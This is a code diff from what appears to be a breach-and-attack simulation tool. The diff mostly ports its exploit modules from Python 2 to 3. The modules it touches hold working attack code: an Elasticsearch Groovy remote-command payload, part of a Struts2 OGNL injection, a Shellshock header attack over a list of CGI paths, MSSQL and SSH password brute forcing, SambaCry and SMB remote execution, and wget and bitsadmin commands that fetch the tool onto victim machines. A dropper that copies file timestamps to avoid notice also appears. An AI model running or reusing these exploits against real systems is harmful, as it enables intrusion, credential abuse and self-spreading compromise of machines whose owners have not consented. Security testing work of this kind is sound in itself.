LOG.warn("Error connecting to control server %s: %s", WormConfiguration.current_server, exc)
|
||||
LOG.warning("Error connecting to control server %s: %s", WormConfiguration.current_server, exc)
|
||||
return {}
|
||||
|
||||
@staticmethod
|
||||
|
@ -261,7 +261,7 @@ class ControlClient(object):
|
|||
return dest_file
|
||||
|
||||
except Exception as exc:
|
||||
LOG.warn("Error connecting to control server %s: %s",
|
||||
LOG.warning("Error connecting to control server %s: %s",
|
||||
WormConfiguration.current_server, exc)
|
||||
|
||||
@staticmethod
|
||||
|
@ -288,7 +288,7 @@ class ControlClient(object):
|
|||
return None, None
|
||||
|
||||
except Exception as exc:
|
||||
LOG.warn("Error connecting to control server %s: %s",
|
||||
LOG.warning("Error connecting to control server %s: %s",
|
||||
WormConfiguration.current_server, exc)
|
||||
|
||||
return None, None
|
||||
|
@ -304,7 +304,7 @@ class ControlClient(object):
|
|||
try:
|
||||
target_addr, target_port = my_proxy.split(':', 1)
|
||||
target_port = int(target_port)
|
||||
except:
|
||||
except ValueError:
|
||||
return None
|
||||
else:
|
||||
proxy_class = HTTPConnectProxy
|
||||
|
|
|
@ -26,7 +26,8 @@ else:
|
|||
try:
|
||||
WindowsError
|
||||
except NameError:
|
||||
WindowsError = None
|
||||
# noinspection PyShadowingBuiltins
|
||||
WindowsError = IOError
|
||||
|
||||
__author__ = 'itamar'
|
||||
|
||||
|
@ -103,17 +104,17 @@ class MonkeyDrops(object):
|
|||
dropper_date_reference_path = WormConfiguration.dropper_date_reference_path_linux
|
||||
try:
|
||||
ref_stat = os.stat(dropper_date_reference_path)
|
||||
except OSError as exc:
|
||||
LOG.warn("Cannot set reference date using '%s', file not found",
|
||||
except OSError:
|
||||
LOG.warning("Cannot set reference date using '%s', file not found",
|
||||
dropper_date_reference_path)
|
||||
else:
|
||||
try:
|
||||
os.utime(self._config['destination_path'],
|
||||
(ref_stat.st_atime, ref_stat.st_mtime))
|
||||
except:
|
||||
LOG.warn("Cannot set reference date to destination file")
|
||||
except OSError:
|
||||
LOG.warning("Cannot set reference date to destination file")
|
||||
|
||||
monkey_options =\
|
||||
monkey_options = \
|
||||
build_monkey_commandline_explicitly(self.opts.parent, self.opts.tunnel, self.opts.server, self.opts.depth)
|
||||
|
||||
if OperatingSystem.Windows == SystemInfoCollector.get_os():
|
||||
|
@ -135,7 +136,7 @@ class MonkeyDrops(object):
|
|||
|
||||
time.sleep(3)
|
||||
if monkey_process.poll() is not None:
|
||||
LOG.warn("Seems like monkey died too soon")
|
||||
LOG.warning("Seems like monkey died too soon")
|
||||
|
||||
def cleanup(self):
|
||||
try:
|
||||
|
|
|
@ -101,7 +101,7 @@
|
|||
"use_file_logging": true,
|
||||
"victims_max_exploit": 15,
|
||||
"victims_max_find": 100,
|
||||
"post_breach_actions" : []
|
||||
"post_breach_actions": []
|
||||
custom_PBA_linux_cmd = ""
|
||||
custom_PBA_windows_cmd = ""
|
||||
PBA_linux_filename = None
|
||||
|
|
|
@ -6,15 +6,14 @@ from datetime import datetime
|
|||
__author__ = 'itamar'
|
||||
|
||||
|
||||
class HostExploiter(object):
|
||||
__metaclass__ = ABCMeta
|
||||
|
||||
class HostExploiter(object, metaclass=ABCMeta):
|
||||
_TARGET_OS_TYPE = []
|
||||
|
||||
# Usual values are 'vulnerability' or 'brute_force'
|
||||
EXPLOIT_TYPE = ExploitType.VULNERABILITY
|
||||
|
||||
@abstractproperty
|
||||
@property
|
||||
@abstractmethod
|
||||
def _EXPLOITED_SERVICE(self):
|
||||
pass
|
||||
|
||||
|
@ -48,7 +47,9 @@ class HostExploiter(object):
|
|||
|
||||
def exploit_host(self):
|
||||
self.pre_exploit()
|
||||
try:
|
||||
result = self._exploit_host()
|
||||
finally:
|
||||
self.post_exploit()
|
||||
return result
|
||||
|
||||
|
|
|
@ -8,7 +8,7 @@ import json
|
|||
import logging
|
||||
import requests
|
||||
from infection_monkey.exploit.web_rce import WebRCE
|
||||
from infection_monkey.model import WGET_HTTP_UPLOAD, BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX,\
|
||||
from infection_monkey.model import WGET_HTTP_UPLOAD, BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX, \
|
||||
DOWNLOAD_TIMEOUT
|
||||
from infection_monkey.network.elasticfinger import ES_PORT
|
||||
from common.data.network_consts import ES_SERVICE
|
||||
|
@ -26,8 +26,8 @@ class ElasticGroovyExploiter(WebRCE):
|
|||
# attack URLs
|
||||
MONKEY_RESULT_FIELD = "monkey_result"
|
||||
GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD
|
||||
JAVA_CMD = GENERIC_QUERY \
|
||||
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
|
||||
JAVA_CMD = \
|
||||
GENERIC_QUERY % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
|
||||
|
||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||
_EXPLOITED_SERVICE = 'Elastic search'
|
||||
|
@ -39,7 +39,7 @@ class ElasticGroovyExploiter(WebRCE):
|
|||
exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
|
||||
exploit_config['dropper'] = True
|
||||
exploit_config['url_extensions'] = ['_search?pretty']
|
||||
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX +" " + BITSADMIN_CMDLINE_HTTP}
|
||||
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP}
|
||||
return exploit_config
|
||||
|
||||
def get_open_service_ports(self, port_list, names):
|
||||
|
@ -83,7 +83,7 @@ class ElasticGroovyExploiter(WebRCE):
|
|||
# Overridden web_rce method that adds CMD prefix for windows command
|
||||
try:
|
||||
if 'windows' in self.host.os['type']:
|
||||
resp = self.exploit(url, CMD_PREFIX+" "+CHECK_COMMAND)
|
||||
resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND)
|
||||
else:
|
||||
resp = self.exploit(url, CHECK_COMMAND)
|
||||
if resp is True:
|
||||
|
|
|
@ -59,7 +59,7 @@ class HadoopExploiter(WebRCE):
|
|||
resp = json.loads(resp.content)
|
||||
app_id = resp['application-id']
|
||||
# Create a random name for our application in YARN
|
||||
rand_name = ID_STRING + "".join([random.choice(string.ascii_lowercase) for _ in xrange(self.RAN_STR_LEN)])
|
||||
rand_name = ID_STRING + "".join([random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)])
|
||||
payload = self.build_payload(app_id, rand_name, command)
|
||||
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload)
|
||||
return resp.status_code == 202
|
||||
|
|
|
@ -10,15 +10,13 @@ from infection_monkey.exploit import HostExploiter
|
|||
from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer
|
||||
from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, build_monkey_commandline, get_monkey_depth
|
||||
from infection_monkey.model import DROPPER_ARG
|
||||
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
|
||||
from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
|
||||
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError
|
||||
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError, FailedExploitationError
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class MSSQLExploiter(HostExploiter):
|
||||
|
||||
_EXPLOITED_SERVICE = 'MSSQL'
|
||||
_TARGET_OS_TYPE = ['windows']
|
||||
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
|
||||
|
@ -73,7 +71,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
|
||||
self.remove_temp_dir()
|
||||
except Exception as e:
|
||||
raise ExploitingVulnerableMachineError, e.args, sys.exc_info()[2]
|
||||
raise ExploitingVulnerableMachineError(e.args).with_traceback(sys.exc_info()[2])
|
||||
|
||||
return True
|
||||
|
||||
|
@ -144,7 +142,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
|
||||
def get_monkey_download_command(self):
|
||||
dst_path = get_monkey_dest_path(self.monkey_server.http_path)
|
||||
monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.\
|
||||
monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND. \
|
||||
format(http_path=self.monkey_server.http_path, dst_path=dst_path)
|
||||
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
|
||||
suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)
|
||||
|
@ -186,12 +184,12 @@ class MSSQLExploiter(HostExploiter):
|
|||
|
||||
LOG.warning('No user/password combo was able to connect to host: {0}:{1}, '
|
||||
'aborting brute force'.format(host, port))
|
||||
raise RuntimeError("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
|
||||
raise FailedExploitationError("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
|
||||
|
||||
|
||||
class MSSQLLimitedSizePayload(LimitedSizePayload):
|
||||
def __init__(self, command, prefix="", suffix=""):
|
||||
super(MSSQLLimitedSizePayload, self).__init__(command=command,
|
||||
max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE,
|
||||
prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START+prefix,
|
||||
suffix=suffix+MSSQLExploiter.XP_CMDSHELL_COMMAND_END)
|
||||
prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START + prefix,
|
||||
suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END)
|
||||
|
|
|
@ -20,7 +20,7 @@ from infection_monkey.exploit import HostExploiter
|
|||
from infection_monkey.model import DROPPER_ARG
|
||||
from infection_monkey.network.smbfinger import SMB_SERVICE
|
||||
from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_target_monkey_by_os, get_monkey_depth
|
||||
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
||||
from infection_monkey.network.tools import get_interface_to_target
|
||||
from infection_monkey.pyinstaller_utils import get_binary_file_path
|
||||
from common.utils.attack_utils import ScanStatus
|
||||
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
|
||||
|
@ -216,6 +216,9 @@ class SambaCryExploiter(HostExploiter):
|
|||
|
||||
pattern = re.compile(r'\d*\.\d*\.\d*')
|
||||
smb_server_name = self.host.services[SMB_SERVICE].get('name')
|
||||
if not smb_server_name:
|
||||
LOG.info("Host: %s refused SMB connection" % self.host.ip_addr)
|
||||
return False
|
||||
samba_version = "unknown"
|
||||
pattern_result = pattern.search(smb_server_name)
|
||||
is_vulnerable = False
|
||||
|
@ -392,7 +395,7 @@ class SambaCryExploiter(HostExploiter):
|
|||
if fileName != '':
|
||||
smb2Create['Buffer'] = fileName.encode('utf-16le')
|
||||
else:
|
||||
smb2Create['Buffer'] = '\x00'
|
||||
smb2Create['Buffer'] = b'\x00'
|
||||
|
||||
if createContexts is not None:
|
||||
smb2Create['Buffer'] += createContexts
|
||||
|
@ -445,7 +448,12 @@ class SambaCryExploiter(HostExploiter):
|
|||
|
||||
return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate)
|
||||
else:
|
||||
return SambaCryExploiter.create_smb(smb_client, treeId, pathName, desiredAccess=FILE_READ_DATA,
|
||||
return SambaCryExploiter.create_smb(
|
||||
smb_client,
|
||||
treeId,
|
||||
pathName,
|
||||
desiredAccess=FILE_READ_DATA,
|
||||
shareMode=FILE_SHARE_READ,
|
||||
creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE,
|
||||
creationOptions=FILE_OPEN,
|
||||
creationDisposition=FILE_NON_DIRECTORY_FILE,
|
||||
fileAttributes=0)
|
||||
|
|
|
@ -179,7 +179,7 @@ class ShellShockExploiter(HostExploiter):
|
|||
LOG.debug("Attack Flag is: %s" % self.success_flag)
|
||||
|
||||
LOG.debug("Trying exploit for %s" % url)
|
||||
for header, exploit in attacks.iteritems():
|
||||
for header, exploit in list(attacks.items()):
|
||||
attack = exploit + ' echo ' + self.success_flag + "; " + TEST_COMMAND
|
||||
result = self.attack_page(url, header, attack)
|
||||
if self.success_flag in result:
|
||||
|
@ -207,7 +207,7 @@ class ShellShockExploiter(HostExploiter):
|
|||
LOG.debug("Header is: %s" % header)
|
||||
LOG.debug("Attack is: %s" % attack)
|
||||
r = requests.get(url, headers={header: attack}, verify=False, timeout=TIMEOUT)
|
||||
result = r.content
|
||||
result = r.content.decode()
|
||||
return result
|
||||
except requests.exceptions.RequestException as exc:
|
||||
LOG.debug("Failed to run, exception %s" % exc)
|
||||
|
|
|
@ -1,7 +1,8 @@
|
|||
# resource for shellshock attack
|
||||
# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
|
||||
|
||||
CGI_FILES = (r'/',
|
||||
CGI_FILES = (
|
||||
r'/',
|
||||
r'/admin.cgi',
|
||||
r'/administrator.cgi',
|
||||
r'/agora.cgi',
|
||||
|
@ -403,4 +404,5 @@ CGI_FILES = (r'/',
|
|||
r'/webtools/bonsai/showcheckins.cgi',
|
||||
r'/wwwadmin.cgi',
|
||||
r'/wwwboard.cgi',
|
||||
r'/wwwboard/wwwboard.cgi')
|
||||
r'/wwwboard/wwwboard.cgi'
|
||||
)
|
||||
|
|
|
@ -108,16 +108,15 @@ class SmbExploiter(HostExploiter):
|
|||
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \
|
||||
build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
||||
|
||||
smb_conn = False
|
||||
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
|
||||
rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,))
|
||||
rpctransport.set_dport(port)
|
||||
|
||||
if hasattr(rpctransport, 'preferred_dialect'):
|
||||
rpctransport.preferred_dialect(SMB_DIALECT)
|
||||
if hasattr(rpctransport, 'set_credentials'):
|
||||
# This method exists only for selected protocol sequences.
|
||||
rpctransport.set_credentials(user, password, '',
|
||||
lm_hash, ntlm_hash, None)
|
||||
rpctransport.set_credentials(user, password, '', lm_hash, ntlm_hash, None)
|
||||
rpctransport.set_kerberos(SmbExploiter.USE_KERBEROS)
|
||||
|
||||
scmr_rpc = rpctransport.get_dce_rpc()
|
||||
|
@ -125,13 +124,14 @@ class SmbExploiter(HostExploiter):
|
|||
try:
|
||||
scmr_rpc.connect()
|
||||
except Exception as exc:
|
||||
LOG.warn("Error connecting to SCM on exploited machine %r: %s",
|
||||
self.host, exc)
|
||||
return False
|
||||
LOG.debug("Can't connect to SCM on exploited machine %r port %s : %s", self.host, port, exc)
|
||||
continue
|
||||
|
||||
smb_conn = rpctransport.get_smb_connection()
|
||||
break
|
||||
|
||||
if not smb_conn:
|
||||
return False
|
||||
# We don't wanna deal with timeouts from now on.
|
||||
smb_conn.setTimeout(100000)
|
||||
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
|
||||
|
|
|
@ -1,16 +1,15 @@
|
|||
import StringIO
|
||||
import io
|
||||
import logging
|
||||
import time
|
||||
|
||||
import paramiko
|
||||
|
||||
import infection_monkey.monkeyfs as monkeyfs
|
||||
from common.utils.exploit_enum import ExploitType
|
||||
from infection_monkey.exploit import HostExploiter
|
||||
from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline
|
||||
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
||||
from infection_monkey.model import MONKEY_ARG
|
||||
from infection_monkey.network.tools import check_tcp_port
|
||||
from infection_monkey.network.tools import check_tcp_port, get_interface_to_target
|
||||
from infection_monkey.exploit.tools.exceptions import FailedExploitationError
|
||||
from common.utils.exploit_enum import ExploitType
|
||||
from common.utils.attack_utils import ScanStatus
|
||||
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
|
||||
|
@ -38,15 +37,16 @@ class SSHExploiter(HostExploiter):
|
|||
LOG.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total)
|
||||
self._update_timestamp = time.time()
|
||||
|
||||
def exploit_with_ssh_keys(self, port, ssh):
|
||||
def exploit_with_ssh_keys(self, port) -> paramiko.SSHClient:
|
||||
user_ssh_key_pairs = self._config.get_exploit_user_ssh_key_pairs()
|
||||
|
||||
exploited = False
|
||||
|
||||
for user, ssh_key_pair in user_ssh_key_pairs:
|
||||
# Creating file-like private key for paramiko
|
||||
pkey = StringIO.StringIO(ssh_key_pair['private_key'])
|
||||
pkey = io.StringIO(ssh_key_pair['private_key'])
|
||||
ssh_string = "%s@%s" % (ssh_key_pair['user'], ssh_key_pair['ip'])
|
||||
|
||||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
|
||||
try:
|
||||
pkey = paramiko.RSAKey.from_private_key(pkey)
|
||||
except(IOError, paramiko.SSHException, paramiko.PasswordRequiredException):
|
||||
|
@ -55,56 +55,53 @@ class SSHExploiter(HostExploiter):
|
|||
ssh.connect(self.host.ip_addr,
|
||||
username=user,
|
||||
pkey=pkey,
|
||||
port=port,
|
||||
timeout=None)
|
||||
port=port)
|
||||
LOG.debug("Successfully logged in %s using %s users private key",
|
||||
self.host, ssh_string)
|
||||
exploited = True
|
||||
self.report_login_attempt(True, user, ssh_key=ssh_string)
|
||||
break
|
||||
except Exception as exc:
|
||||
return ssh
|
||||
except Exception:
|
||||
ssh.close()
|
||||
LOG.debug("Error logging into victim %r with %s"
|
||||
" private key", self.host,
|
||||
ssh_string)
|
||||
self.report_login_attempt(False, user, ssh_key=ssh_string)
|
||||
continue
|
||||
return exploited
|
||||
raise FailedExploitationError
|
||||
|
||||
def exploit_with_login_creds(self, port, ssh):
|
||||
def exploit_with_login_creds(self, port) -> paramiko.SSHClient:
|
||||
user_password_pairs = self._config.get_exploit_user_password_pairs()
|
||||
|
||||
exploited = False
|
||||
|
||||
for user, current_password in user_password_pairs:
|
||||
|
||||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
|
||||
try:
|
||||
ssh.connect(self.host.ip_addr,
|
||||
username=user,
|
||||
password=current_password,
|
||||
port=port,
|
||||
timeout=None)
|
||||
port=port)
|
||||
|
||||
LOG.debug("Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)",
|
||||
self.host, user, self._config.hash_sensitive_data(current_password))
|
||||
exploited = True
|
||||
self.add_vuln_port(port)
|
||||
self.report_login_attempt(True, user, current_password)
|
||||
break
|
||||
return ssh
|
||||
|
||||
except Exception as exc:
|
||||
LOG.debug("Error logging into victim %r with user"
|
||||
" %s and password (SHA-512) '%s': (%s)", self.host,
|
||||
user, self._config.hash_sensitive_data(current_password), exc)
|
||||
self.report_login_attempt(False, user, current_password)
|
||||
ssh.close()
|
||||
continue
|
||||
return exploited
|
||||
raise FailedExploitationError
|
||||
|
||||
def _exploit_host(self):
|
||||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
|
||||
|
||||
port = SSH_PORT
|
||||
# if ssh banner found on different port, use that port.
|
||||
for servkey, servdata in self.host.services.items():
|
||||
for servkey, servdata in list(self.host.services.items()):
|
||||
if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
|
||||
port = int(servkey.replace('tcp-', ''))
|
||||
|
||||
|
@ -113,19 +110,19 @@ class SSHExploiter(HostExploiter):
|
|||
LOG.info("SSH port is closed on %r, skipping", self.host)
|
||||
return False
|
||||
|
||||
# Check for possible ssh exploits
|
||||
exploited = self.exploit_with_ssh_keys(port, ssh)
|
||||
if not exploited:
|
||||
exploited = self.exploit_with_login_creds(port, ssh)
|
||||
|
||||
if not exploited:
|
||||
try:
|
||||
ssh = self.exploit_with_ssh_keys(port)
|
||||
except FailedExploitationError:
|
||||
try:
|
||||
ssh = self.exploit_with_login_creds(port)
|
||||
except FailedExploitationError:
|
||||
LOG.debug("Exploiter SSHExploiter is giving up...")
|
||||
return False
|
||||
|
||||
if not self.host.os.get('type'):
|
||||
try:
|
||||
_, stdout, _ = ssh.exec_command('uname -o')
|
||||
uname_os = stdout.read().lower().strip()
|
||||
uname_os = stdout.read().lower().strip().decode()
|
||||
if 'linux' in uname_os:
|
||||
self.host.os['type'] = 'linux'
|
||||
else:
|
||||
|
@ -138,7 +135,7 @@ class SSHExploiter(HostExploiter):
|
|||
if not self.host.os.get('machine'):
|
||||
try:
|
||||
_, stdout, _ = ssh.exec_command('uname -m')
|
||||
uname_machine = stdout.read().lower().strip()
|
||||
uname_machine = stdout.read().lower().strip().decode()
|
||||
if '' != uname_machine:
|
||||
self.host.os['machine'] = uname_machine
|
||||
except Exception as exc:
|
||||
|
|
|
@ -3,13 +3,14 @@
|
|||
code used is from https://www.exploit-db.com/exploits/41570/
|
||||
Vulnerable struts2 versions <=2.3.31 and <=2.5.10
|
||||
"""
|
||||
import urllib2
|
||||
import httplib
|
||||
import unicodedata
|
||||
import http.client
|
||||
import logging
|
||||
import re
|
||||
import ssl
|
||||
import urllib.error
|
||||
import urllib.parse
|
||||
import urllib.request
|
||||
|
||||
import logging
|
||||
from infection_monkey.exploit.web_rce import WebRCE
|
||||
|
||||
__author__ = "VakarisZ"
|
||||
|
@ -47,10 +48,10 @@ class Struts2Exploiter(WebRCE):
|
|||
def get_redirected(url):
|
||||
# Returns false if url is not right
|
||||
headers = {'User-Agent': 'Mozilla/5.0'}
|
||||
request = urllib2.Request(url, headers=headers)
|
||||
request = urllib.request.Request(url, headers=headers)
|
||||
try:
|
||||
return urllib2.urlopen(request, context=ssl._create_unverified_context()).geturl()
|
||||
except urllib2.URLError:
|
||||
return urllib.request.urlopen(request, context=ssl._create_unverified_context()).geturl()
|
||||
except urllib.error.URLError:
|
||||
LOG.error("Can't reach struts2 server")
|
||||
return False
|
||||
|
||||
|
@ -79,18 +80,15 @@ class Struts2Exploiter(WebRCE):
|
|||
"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." \
|
||||
"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \
|
||||
"(#ros.flush())}" % cmd
|
||||
# Turns payload ascii just for consistency
|
||||
if isinstance(payload, unicode):
|
||||
payload = unicodedata.normalize('NFKD', payload).encode('ascii', 'ignore')
|
||||
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
|
||||
try:
|
||||
request = urllib2.Request(url, headers=headers)
|
||||
request = urllib.request.Request(url, headers=headers)
|
||||
# Timeout added or else we would wait for all monkeys' output
|
||||
page = urllib2.urlopen(request).read()
|
||||
page = urllib.request.urlopen(request).read()
|
||||
except AttributeError:
|
||||
# If url does not exist
|
||||
return False
|
||||
except httplib.IncompleteRead as e:
|
||||
page = e.partial
|
||||
except http.client.IncompleteRead as e:
|
||||
page = e.partial.decode()
|
||||
|
||||
return page
|
||||
|
|
|
@ -1,5 +1,6 @@
|
|||
|
||||
|
||||
class ExploitingVulnerableMachineError(Exception):
|
||||
""" Raise when exploiter failed, but machine is vulnerable"""
|
||||
pass
|
||||
|
||||
|
||||
class FailedExploitationError(Exception):
|
||||
""" Raise when exploiter fails instead of returning False"""
|
||||
|
|
|
@ -1,52 +1,8 @@
|
|||
import logging
|
||||
import socket
|
||||
import struct
|
||||
import sys
|
||||
|
||||
from infection_monkey.network.info import get_routes
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
||||
def get_interface_to_target(dst):
|
||||
"""
|
||||
:param dst: destination IP address string without port. E.G. '192.168.1.1.'
|
||||
:return: IP address string of an interface that can connect to the target. E.G. '192.168.1.4.'
|
||||
"""
|
||||
if sys.platform == "win32":
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
try:
|
||||
s.connect((dst, 1))
|
||||
ip_to_dst = s.getsockname()[0]
|
||||
except KeyError:
|
||||
LOG.debug("Couldn't get an interface to the target, presuming that target is localhost.")
|
||||
ip_to_dst = '127.0.0.1'
|
||||
finally:
|
||||
s.close()
|
||||
return ip_to_dst
|
||||
else:
|
||||
# based on scapy implementation
|
||||
|
||||
def atol(x):
|
||||
ip = socket.inet_aton(x)
|
||||
return struct.unpack("!I", ip)[0]
|
||||
|
||||
routes = get_routes()
|
||||
dst = atol(dst)
|
||||
paths = []
|
||||
for d, m, gw, i, a in routes:
|
||||
aa = atol(a)
|
||||
if aa == dst:
|
||||
paths.append((0xffffffff, ("lo", a, "0.0.0.0")))
|
||||
if (dst & m) == (d & m):
|
||||
paths.append((m, (i, a, gw)))
|
||||
if not paths:
|
||||
return None
|
||||
paths.sort()
|
||||
ret = paths[-1][1]
|
||||
return ret[1]
|
||||
|
||||
|
||||
def try_get_target_monkey(host):
|
||||
src_path = get_target_monkey(host)
|
||||
if not src_path:
|
||||
|
|
|
@ -1,14 +1,17 @@
|
|||
import logging
|
||||
import os
|
||||
import os.path
|
||||
import urllib
|
||||
import urllib.error
|
||||
import urllib.parse
|
||||
import urllib.request
|
||||
from threading import Lock
|
||||
|
||||
from infection_monkey.model import DOWNLOAD_TIMEOUT
|
||||
from infection_monkey.network.firewall import app as firewall
|
||||
from infection_monkey.network.info import get_free_tcp_port
|
||||
from infection_monkey.transport import HTTPServer, LockedHTTPServer
|
||||
from infection_monkey.exploit.tools.helpers import try_get_target_monkey, get_interface_to_target
|
||||
from infection_monkey.model import DOWNLOAD_TIMEOUT
|
||||
from infection_monkey.exploit.tools.helpers import try_get_target_monkey
|
||||
from infection_monkey.network.tools import get_interface_to_target
|
||||
|
||||
__author__ = 'itamar'
|
||||
|
||||
|
@ -32,7 +35,7 @@ class HTTPTools(object):
|
|||
httpd.daemon = True
|
||||
httpd.start()
|
||||
|
||||
return "http://%s:%s/%s" % (local_ip, local_port, urllib.quote(os.path.basename(src_path))), httpd
|
||||
return "http://%s:%s/%s" % (local_ip, local_port, urllib.parse.quote(os.path.basename(src_path))), httpd
|
||||
|
||||
@staticmethod
|
||||
def try_create_locked_transfer(host, src_path, local_ip=None, local_port=None):
|
||||
|
@ -68,7 +71,7 @@ class HTTPTools(object):
|
|||
httpd = LockedHTTPServer(local_ip, local_port, src_path, lock)
|
||||
httpd.start()
|
||||
lock.acquire()
|
||||
return "http://%s:%s/%s" % (local_ip, local_port, urllib.quote(os.path.basename(src_path))), httpd
|
||||
return "http://%s:%s/%s" % (local_ip, local_port, urllib.parse.quote(os.path.basename(src_path))), httpd
|
||||
|
||||
|
||||
class MonkeyHTTPServer(HTTPTools):
|
||||
|
|
|
@ -49,7 +49,7 @@ class LimitedSizePayload(Payload):
|
|||
"exceeds required length of command.")
|
||||
|
||||
elif self.command == "":
|
||||
return [self.prefix+self.suffix]
|
||||
return [self.prefix + self.suffix]
|
||||
wrapper = textwrap.TextWrapper(drop_whitespace=False, width=self.get_max_sub_payload_length())
|
||||
commands = [self.get_payload(part)
|
||||
for part
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
from unittest import TestCase
|
||||
from payload_parsing import Payload, LimitedSizePayload
|
||||
from .payload_parsing import Payload, LimitedSizePayload
|
||||
|
||||
|
||||
class TestPayload(TestCase):
|
||||
|
@ -29,4 +29,3 @@ class TestPayload(TestCase):
|
|||
array2[1] == "prefix5678suffix" and len(array2) == 2)
|
||||
|
||||
assert test1 and test2
|
||||
|
||||
|
|
|
@ -10,8 +10,9 @@ import infection_monkey.config
|
|||
import infection_monkey.monkeyfs as monkeyfs
|
||||
from common.utils.attack_utils import ScanStatus
|
||||
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
|
||||
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
||||
from infection_monkey.network.tools import get_interface_to_target
|
||||
from infection_monkey.config import Configuration
|
||||
|
||||
__author__ = 'itamar'
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
|
|
@ -48,7 +48,7 @@ class WmiTools(object):
|
|||
except Exception as exc:
|
||||
dcom.disconnect()
|
||||
|
||||
if "rpc_s_access_denied" == exc.message:
|
||||
if "rpc_s_access_denied" == exc:
|
||||
raise AccessDeniedException(host, username, password, domain)
|
||||
|
||||
raise
|
||||
|
@ -86,9 +86,9 @@ class WmiTools(object):
|
|||
|
||||
@staticmethod
|
||||
def dcom_cleanup():
|
||||
for port_map in DCOMConnection.PORTMAPS.keys():
|
||||
for port_map in list(DCOMConnection.PORTMAPS.keys()):
|
||||
del DCOMConnection.PORTMAPS[port_map]
|
||||
for oid_set in DCOMConnection.OID_SET.keys():
|
||||
for oid_set in list(DCOMConnection.OID_SET.keys()):
|
||||
del DCOMConnection.OID_SET[port_map]
|
||||
|
||||
DCOMConnection.OID_SET = {}
|
||||
|
@ -132,7 +132,7 @@ class WmiTools(object):
|
|||
record = next_item.getProperties()
|
||||
|
||||
if not fields:
|
||||
fields = record.keys()
|
||||
fields = list(record.keys())
|
||||
|
||||
query_record = {}
|
||||
for key in fields:
|
||||
|
|
|
@ -45,7 +45,7 @@ class VSFTPDExploiter(HostExploiter):
|
|||
s.connect((ip_addr, port))
|
||||
return True
|
||||
except socket.error as e:
|
||||
LOG.error('Failed to connect to %s', self.host.ip_addr)
|
||||
LOG.info('Failed to connect to %s: %s', self.host.ip_addr, str(e))
|
||||
return False
|
||||
|
||||
def socket_send_recv(self, s, message):
|
||||
|
@ -53,7 +53,7 @@ class VSFTPDExploiter(HostExploiter):
|
|||
s.send(message)
|
||||
return s.recv(RECV_128).decode('utf-8')
|
||||
except socket.error as e:
|
||||
